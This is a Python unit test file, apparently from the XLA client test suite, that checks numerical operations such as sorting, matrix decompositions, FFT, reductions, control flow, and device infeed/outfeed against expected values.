c = self._NewComputation()
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
])
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 3)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
ops.GetTupleElement(
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
]), 1)
self._ExecuteAndCompareClose(c, expected=[[1.0, 2.0]])
def testBroadcast(self):
c = self._NewComputation()
ops.Broadcast(
ops.Constant(c, NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]])
def testBroadcastInDim(self):
c = self._NewComputation()
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[[1, 1], [2, 2]]])
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[[1, 2], [1, 2]]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
ops.RngNormal(
ops.Constant(c, NumpyArrayF32(0.)),
ops.Constant(c, NumpyArrayF32(1.)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape and uniqueness
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayF32(lo)),
ops.Constant(c, NumpyArrayF32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, uniqueness, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayS32(lo)),
ops.Constant(c, NumpyArrayS32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, integrality, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertEqual(result[0].dtype, np.int32)
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
ops.Cholesky(ops.Constant(c, np.tril(np.dot(l, l.T))))
self._ExecuteAndCompareClose(c, expected=[l], rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
ops.Sort(c, [ops.Constant(c, keys)], is_stable=True)
self._ExecuteAndCompareClose(
c,
expected=[np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32)])
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(c, (ops.Constant(c, keys), ops.Constant(c, values)), dimension=0)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
p1 = ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
q1 = ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Or(ops.Lt(p0, q0), ops.And(ops.Eq(p0, q0), ops.Gt(p1, q1)))
comparator = b.build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(
c, (ops.Constant(c, keys), ops.Constant(c, values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.QR(ops.Constant(c, a), full_matrices=True))
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
  def testEigh(self):
    # Symmetric eigendecomposition via ops.Eigh. Only graph construction is
    # exercised today; the numeric check is disabled (see TODO below).
    a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
                  [10, 63, 166, 310]],
                 dtype=np.float32)
    # Symmetrize so Eigh's precondition (self-adjoint input) holds exactly.
    a = (a + a.T) / 2
    c = self._NewComputation()
    ops.Tuple(c, ops.Eigh(ops.Constant(c, a), lower=True))
    # TODO(b/129396575): Turn this test back on when it passes without
    # fastmath.
    # v, w = self._Execute(c, ())
    # self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.SVD(ops.Constant(c, a)))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
ops.TriangularSolve(
ops.Constant(c, a_vals),
ops.Constant(c, b_vals),
left_side=False,
lower=True,
transpose_a=ops.TriangularSolveOptions_Transpose.TRANSPOSE,
unit_diagonal=False)
self._ExecuteAndCompareClose(
c,
expected=[
np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32)
],
rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = ops.Constant(c, np.int32(3))
b = ops.Constant(c, np.int32(1))
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayS32(0)))
const_expr = ops.Sub(b, a)
non_const_expr = ops.Mul(const_expr, x)
self.assertTrue(c.is_constant(const_expr))
self.assertFalse(c.is_constant(non_const_expr))
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
ops.Gather(
ops.Constant(c, a),
ops.Constant(c, indices),
dnums,
slice_sizes=[1, 1])
g, = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
if self.backend.platform == "tpu":
self.skipTest("TPU only supports 1D FFT")
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.fftn(a, axes=(1, 2, 3))], rtol=1e-4)
# IFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.ifftn(a, axes=(1, 2, 3))], rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
ops.Fft(ops.Constant(c, b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.rfftn(b, axes=(1, 2, 3))], rtol=1e-4)
# IRFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(
c, expected=[np.fft.irfftn(a, axes=(1, 2, 3))], rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
ops.NextAfter(
ops.Constant(c, np.array([1, 2], dtype=np.float32)),
ops.Constant(c, np.array([2, 1], dtype=np.float32)))
out, = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(
np.array([eps + 1, 2 - eps], dtype=np.float32), out)
  # Parameterized over all float dtypes; testcase names encode the dtype.
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testRegularizedIncompleteBeta(self, dtype):
    # I_x(a, b) on a fixed sample; expected values are reference results,
    # compared loosely (rtol=2e-2) to tolerate low-precision dtypes.
    x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538],
                 dtype=dtype)
    a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606],
                 dtype=dtype)
    b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677],
                 dtype=dtype)
    c = self._NewComputation()
    ops.RegularizedIncompleteBeta(
        ops.Constant(c, a), ops.Constant(c, b), ops.Constant(c, x))
    expected = np.array(
        [0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
    self._ExecuteAndCompareClose(c, expected=[expected], rtol=2e-2)
# Register SingleOpTest with the suite list returned by this factory.
tests.append(SingleOpTest)
class EmbeddedComputationsTest(ComputationTest):
  """Tests for XLA graphs with embedded computations (such as maps)."""

  def _CreateConstantComputation(self, in_dtype, out_dtype):
    """Computation (A) -> B that returns a constant 1 for any input."""
    c = self._NewComputation("constant_{}_{}_one".format(
        in_dtype.__name__, out_dtype.__name__))
    ops.Parameter(c, 0,
                  xla_client.shape_from_pyval(np.array(0, dtype=in_dtype)))
    ops.Constant(c, out_dtype(1))
    return c.build()

  def _CreateMulBy2Computation(self, dtype):
    """Computation (dtype) -> dtype that multiplies its parameter by 2."""
    c = self._NewComputation("mul_f32_by2")
    ops.Mul(
        ops.Parameter(
            c, 0,
            xla_client.shape_from_pyval(np.array(
                0, dtype=dtype)).with_major_to_minor_layout_if_absent()),
        ops.Constant(c, dtype(2.0)))
    return c.build()

  def _CreateMulF32ByParamComputation(self):
    """Computation (f32) -> f32 that multiplies one parameter by the other."""
    c = self._NewComputation("mul_f32_by_param")
    ops.Mul(
        ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0))),
        ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0))))
    return c.build()

  def _CreateBinaryAddComputation(self, dtype):
    """Computation (dtype, dtype) -> dtype that adds its two parameters."""
    c = self._NewComputation("add_param0_by_param1")
    shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
    shape = shape.with_major_to_minor_layout_if_absent()
    ops.Add(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
    return c.build()

  def _CreateBinaryGeComputation(self, dtype):
    """Computation (dtype, dtype) -> bool that tests param0 >= param1."""
    # NOTE(review): the computation name says "lt" but the op is Ge —
    # harmless (the name is only a label), but worth confirming.
    c = self._NewComputation("param0_lt_param1")
    shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
    shape = shape.with_major_to_minor_layout_if_absent()
    ops.Ge(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
    return c.build()

  def _MakeSample3DArray(self, dtype):
    # 4x2x3 sample used by the 3-D reduction tests.
    return np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
                     [[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]],
                    dtype=dtype)

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testCall(self, dtype):
    # Call the mul-by-2 subcomputation on a scalar constant.
    c = self._NewComputation()
    ops.Call(
        c,
        self._CreateMulBy2Computation(dtype),
        operands=(ops.Constant(c, dtype(5.0)),))
    self._ExecuteAndCompareClose(c, expected=[10.0])

  @parameterized.named_parameters({
      "testcase_name": "_{}_{}".format(in_dtype.__name__, out_dtype.__name__),
      "in_dtype": in_dtype,
      "out_dtype": out_dtype,
  } for in_dtype, out_dtype in [[np.float32, np.int32]])
  def testMapEachElementToConstant(self, in_dtype, out_dtype):
    # Map with a constant-producing computation: every element becomes 1,
    # with a dtype change from in_dtype to out_dtype.
    c = self._NewComputation()
    ops.Map(c,
            [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=in_dtype))],
            self._CreateConstantComputation(in_dtype, out_dtype), [0])
    self._ExecuteAndCompareExact(c, expected=[[1, 1, 1, 1]])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testMapMulBy2(self, dtype):
    # Map the mul-by-2 computation over a vector.
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    c = self._NewComputation()
    ops.Map(c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
            self._CreateMulBy2Computation(dtype), [0])
    self._ExecuteAndCompareClose(c, expected=[[2.0, 4.0, 6.0, 8.0]])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testSimpleMapChain(self, dtype):
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    # Chains a map of constant-out with a map of mul-by-2
    c = self._NewComputation()
    const = ops.Map(
        c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
        self._CreateConstantComputation(dtype, dtype), [0])
    ops.Map(c, [const], self._CreateMulBy2Computation(dtype), [0])
    self._ExecuteAndCompareClose(c, expected=[[2.0, 2.0, 2.0, 2.0]])

  # TODO(b/154752816): bfloat16 crashes in evaluator.
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes if dtype != bfloat16)
  def testDivVectorsWithMap(self, dtype):
    # Two-operand Map: elementwise division of two vectors via a binary
    # subcomputation.

    def DivComputation():
      c = self._NewComputation("div_param0_by_param1")
      shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
      ops.Div(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
      return c.build()

    c = self._NewComputation()
    ops.Map(c, (ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype)),
                ops.Constant(c, np.array([5.0, 5.0, 4.0, 4.0], dtype=dtype))),
            DivComputation(), [0])
    self._ExecuteAndCompareClose(
        c, expected=[[0.2, 0.4, 0.75, 1.0]], rtol=1e-3)

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testSelectAndScatter(self, dtype):
    # SelectAndScatter: select the window maximum (via the Ge computation)
    # and scatter the source values into the selected positions, starting
    # from init_value 1.
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    c = self._NewComputation()
    operand = ops.Constant(
        c, np.array([[1., 2., 6.], [4., 5., 3.]], dtype=dtype))
    window_dimensions = (2, 1)
    window_strides = (1, 2)
    padding = xla_client.window_padding_type_to_pad_values(
        xla_client.PaddingType.VALID,
        c.get_shape(operand).dimensions(), window_dimensions, window_strides)
    ops.SelectAndScatterWithGeneralPadding(
        operand,
        select=self._CreateBinaryGeComputation(dtype),
        window_dimensions=window_dimensions,
        window_strides=window_strides,
        padding=padding,
        source=ops.Constant(c, np.array([[0.1, 0.2]], dtype=dtype)),
        init_value=ops.Constant(c, np.array(1, dtype=dtype)),
        scatter=self._CreateBinaryAddComputation(dtype))
    self._ExecuteAndCompareClose(
        c, expected=[[[1., 1., 1.2], [1.1, 1., 1.]]], rtol=5e-3)

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testReduce1DtoScalar(self, dtype):
    # Sum-reduce a vector to a scalar.
    c = self._NewComputation()
    ops.Reduce(
        c,
        operands=[
            ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))
        ],
        init_values=[ops.Constant(c, dtype(0))],
        computation=self._CreateBinaryAddComputation(dtype),
        dimensions_to_reduce=[0])
    self._ExecuteAndCompareClose(c, expected=[10])

  # TODO(phawkins): test comparison harness doesn't support bfloat16
  @parameterized.named_parameters({
      "testcase_name": "_{}_dim{}".format(dtype.__name__, dim),
      "dtype": dtype,
      "dim": dim,
  } for dtype in float_dtypes if dtype != bfloat16 for dim in range(2))
  def testReduce2DTo1D(self, dtype, dim):
    # Sum-reduce a 2-D array along each dimension in turn; expected value
    # comes from np.sum on the same axis.
    input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
    c = self._NewComputation()
    ops.Reduce(
        c,
        operands=[ops.Constant(c, input_array)],
        init_values=[ops.Constant(c, dtype(0))],
        computation=self._CreateBinaryAddComputation(dtype),
        dimensions_to_reduce=[dim])
    self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dim)])

  @parameterized.named_parameters({
      "testcase_name": "_{}_dims[{}]".format(dtype.__name__, dims),
      "dtype": dtype,
      "dims": tuple(dims)
  } for dtype in float_dtypes for dims in itertools.permutations(range(3)))
  def testReduce3DAllPossibleWaysF32(self, dtype, dims):
    # Sum-reduce a 3-D array over every permutation of its axes.
    input_array = self._MakeSample3DArray(dtype)
    c = self._NewComputation()
    ops.Reduce(
        c,
        operands=[ops.Constant(c, input_array)],
        init_values=[ops.Constant(c, dtype(0))],
        computation=self._CreateBinaryAddComputation(dtype),
        dimensions_to_reduce=dims)
    self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dims)])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testReduceWindowValidUnitStrides(self, dtype):
    # 2x1 sum windows, VALID padding, unit strides: one output row of
    # column sums.
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
    c = self._NewComputation()
    window_dimensions = (2, 1)
    window_strides = (1, 1)
    padding = xla_client.window_padding_type_to_pad_values(
        xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
        window_strides)
    ops.ReduceWindowWithGeneralPadding(
        operand=ops.Constant(c, input_array),
        init_value=ops.Constant(c, dtype(0)),
        computation=self._CreateBinaryAddComputation(dtype),
        window_dimensions=window_dimensions,
        window_strides=window_strides,
        base_dilations=[],
        window_dilations=[],
        padding=padding)
    self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.]]])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testReduceWindowSameUnitStrides(self, dtype):
    # Same as above but SAME padding: output keeps the input's shape, the
    # second row sums a padded (zero) partner.
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
    c = self._NewComputation()
    window_dimensions = (2, 1)
    window_strides = (1, 1)
    padding = xla_client.window_padding_type_to_pad_values(
        xla_client.PaddingType.SAME, input_array.shape, window_dimensions,
        window_strides)
    ops.ReduceWindowWithGeneralPadding(
        operand=ops.Constant(c, input_array),
        init_value=ops.Constant(c, dtype(0)),
        computation=self._CreateBinaryAddComputation(dtype),
        window_dimensions=window_dimensions,
        window_strides=window_strides,
        base_dilations=[],
        window_dilations=[],
        padding=padding)
    self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.], [4., 5., 6.]]])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testReduceWindowValidGeneralStrides(self, dtype):
    # 2x1 windows with stride 2 in the minor dimension: every other column.
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
    c = self._NewComputation()
    window_dimensions = (2, 1)
    window_strides = (1, 2)
    padding = xla_client.window_padding_type_to_pad_values(
        xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
        window_strides)
    ops.ReduceWindowWithGeneralPadding(
        operand=ops.Constant(c, input_array),
        init_value=ops.Constant(c, dtype(0)),
        computation=self._CreateBinaryAddComputation(dtype),
        window_dimensions=window_dimensions,
        window_strides=window_strides,
        base_dilations=[],
        window_dilations=[],
        padding=padding)
    self._ExecuteAndCompareClose(c, expected=[[[5., 9.]]])

  def testReduceWindowVariadic(self):
    # Variadic ReduceWindow: a (key, value) argmax-style reducer that keeps
    # the pair whose key is larger.
    c = self._NewComputation("reducer")
    shape = xla_client.shape_from_pyval(np.array(0, dtype=np.int32))
    shape = shape.with_major_to_minor_layout_if_absent()
    ps = [ops.Parameter(c, i, shape) for i in range(4)]
    which = ops.Ge(ps[0], ps[2])
    ops.Tuple(
        c, [ops.Select(which, ps[0], ps[2]),
            ops.Select(which, ps[1], ps[3])])
    reducer = c.build()

    key_array = np.array([[1, 5, 6], [4, 2, 3]], dtype=np.int32)
    val_array = np.array([[7, 8, 9], [10, 11, 12]], dtype=np.int32)
    c = self._NewComputation()
    window_dimensions = (2, 1)
    window_strides = (1, 1)
    padding = xla_client.window_padding_type_to_pad_values(
        xla_client.PaddingType.VALID, key_array.shape, window_dimensions,
        window_strides)
    ops.ReduceWindowWithGeneralPadding(
        operands=[ops.Constant(c, key_array),
                  ops.Constant(c, val_array)],
        init_values=[
            ops.Constant(c, np.int32(0)),
            ops.Constant(c, np.int32(0))
        ],
        computation=reducer,
        window_dimensions=window_dimensions,
        window_strides=window_strides,
        base_dilations=[],
        window_dilations=[],
        padding=padding)
    self._ExecuteAndCompareClose(c, expected=[[[4, 5, 6]], [[10, 8, 9]]])

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testWhile(self, dtype):
    # While loop: double 1.0 until it reaches >= 10 (1 -> 2 -> 4 -> 8 -> 16).

    def LessThan10Cond():
      c = self._NewComputation("test_lt_10")
      shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
      ops.Lt(ops.Parameter(c, 0, shape), ops.Constant(c, dtype(10.)))
      return c.build()

    cond = LessThan10Cond()
    body = self._CreateMulBy2Computation(dtype)
    c = self._NewComputation()
    init = ops.Constant(c, dtype(1.))
    ops.While(cond, body, init)
    self._ExecuteAndCompareClose(c, expected=[16.])

  def testConditionalTrue(self):
    # True branch: mul-by-2 on 3.0 -> 6.0.
    c = self._NewComputation()
    pred = ops.Constant(c, np.bool_(True))
    true_operand = ops.Constant(c, np.float32(3.))
    true_computation = self._CreateMulBy2Computation(np.float32)
    false_operand = ops.Constant(c, np.float32(2.))
    false_computation = self._CreateConstantComputation(
        np.float32, np.float32)
    ops.Conditional(pred, true_operand, true_computation, false_operand,
                    false_computation)
    self._ExecuteAndCompareClose(c, expected=[6.])

  def testConditionalFalse(self):
    # False branch: constant-1 computation, regardless of the operand.
    c = self._NewComputation()
    pred = ops.Constant(c, np.bool_(False))
    true_operand = ops.Constant(c, np.float32(3.))
    true_computation = self._CreateMulBy2Computation(np.float32)
    false_operand = ops.Constant(c, np.float32(2.))
    false_computation = self._CreateConstantComputation(
        np.float32, np.float32)
    ops.Conditional(pred, true_operand, true_computation, false_operand,
                    false_computation)
    self._ExecuteAndCompareClose(c, expected=[1.])

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testInfeedS32Values(self):
    # Feed scalars one at a time through the infeed queue and read each
    # back from a fresh execution.
    to_infeed = NumpyArrayS32([1, 2, 3, 4])
    c = self._NewComputation()
    ops.GetTupleElement(
        ops.InfeedWithToken(
            ops.CreateToken(c),
            xla_client.shape_from_pyval(
                to_infeed[0]).with_major_to_minor_layout_if_absent()), 0)
    compiled_c = self.backend.compile(c.build())
    device = self.backend.local_devices()[0]
    for item in to_infeed:
      device.transfer_to_infeed(item)

    for item in to_infeed:
      result, = xla_client.execute_with_python_values(
          compiled_c, (), backend=self.backend)
      self.assertEqual(result, item)

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testInfeedTuple(self):
    # Feed a whole tuple through the infeed queue in one transfer.
    to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
    c = self._NewComputation()
    ops.GetTupleElement(
        ops.InfeedWithToken(
            ops.CreateToken(c),
            xla_client.shape_from_pyval(
                to_infeed).with_major_to_minor_layout_if_absent()), 0)
    compiled_c = self.backend.compile(c.build())
    device = self.backend.local_devices()[0]
    device.transfer_to_infeed(to_infeed)

    result = xla_client.execute_with_python_values(
        compiled_c, (), backend=self.backend)
    self.assertLen(result, 2)
    np.testing.assert_equal(result[0], to_infeed[0])
    np.testing.assert_equal(result[1], to_infeed[1])

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testInfeedThenOutfeedS32(self):
    # Round-trip: infeed a scalar, outfeed it back. Execution runs on a
    # separate thread because transfer_to_infeed/transfer_from_outfeed
    # block until the device-side op is reached.
    to_round_trip = NumpyArrayS32([1, 2, 3, 4])
    c = self._NewComputation()
    x_and_token = ops.InfeedWithToken(
        ops.CreateToken(c),
        xla_client.shape_from_pyval(
            to_round_trip[0]).with_major_to_minor_layout_if_absent())
    x = ops.GetTupleElement(x_and_token, 0)
    token = ops.GetTupleElement(x_and_token, 1)
    outfeed_shape = xla_client.shape_from_pyval(
        to_round_trip[0]).with_major_to_minor_layout_if_absent()
    ops.OutfeedWithToken(x, token, outfeed_shape)

    compiled_c = self.backend.compile(c.build())
    device = self.backend.local_devices()[0]

    for want in to_round_trip:
      execution = threading.Thread(target=lambda: compiled_c.execute([]))
      execution.start()
      device.transfer_to_infeed(want)
      got = device.transfer_from_outfeed(outfeed_shape)
      execution.join()
      self.assertEqual(want, got)

  def testScatter(self):
    # Scatter rows 0 and 2 of a 3x3 operand with an add combiner; row 1 is
    # untouched.
    a = np.arange(9).astype(np.int32).reshape((3, 3))
    scatter_indices = np.array([0, 2], dtype=np.int32)
    updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)

    dnums = xla_client.ScatterDimensionNumbers()
    dnums.update_window_dims.append(1)
    dnums.inserted_window_dims.append(0)
    dnums.scatter_dims_to_operand_dims.append(0)
    dnums.index_vector_dim = 1

    c = self._NewComputation()
    ops.Scatter(
        ops.Constant(c, a), ops.Constant(c, scatter_indices),
        ops.Constant(c, updates), self._CreateBinaryAddComputation(np.int32),
        dnums)
    expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]],
                        dtype=np.int32)
    self._ExecuteAndCompareClose(c, expected=[expected])
class DeviceTest(ComputationTest):

  def testPlatform(self):
    # Every local device must report the backend's platform name.
    expected_platform = self.backend.platform
    for device in self.backend.local_devices():
      self.assertEqual(device.platform, expected_platform)
# Register DeviceTest with the suite list returned by this factory.
tests.append(DeviceTest)
class ErrorTest(ComputationTest):
  """Checks that shape mismatches surface as descriptive RuntimeErrors."""

  def setUp(self):
    super(ErrorTest, self).setUp()
    self.f32_scalar_2 = NumpyArrayF32(2.0)
    self.s32_scalar_2 = NumpyArrayS32(2)

  def testCompileWithWrongElementTypeInLayout(self):
    # Compiling with an f32 argument layout for an s32 parameter must fail.
    builder = self._NewComputation()
    builder.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
    ops.Parameter(builder, 0,
                  xla_client.shape_from_pyval(self.s32_scalar_2))
    builder.clear_op_metadata()

    options = xla_client.CompileOptions()
    options.argument_layouts = [
        xla_client.Shape.array_shape(np.dtype(np.float32), [])
    ]

    def TestFun():
      return self.backend.compile(builder.build(), compile_options=options)

    self.assertRaisesRegex(
        RuntimeError, r".*Invalid argument shape.*"
        r"expected s32\[\], got f32\[\].*", TestFun)

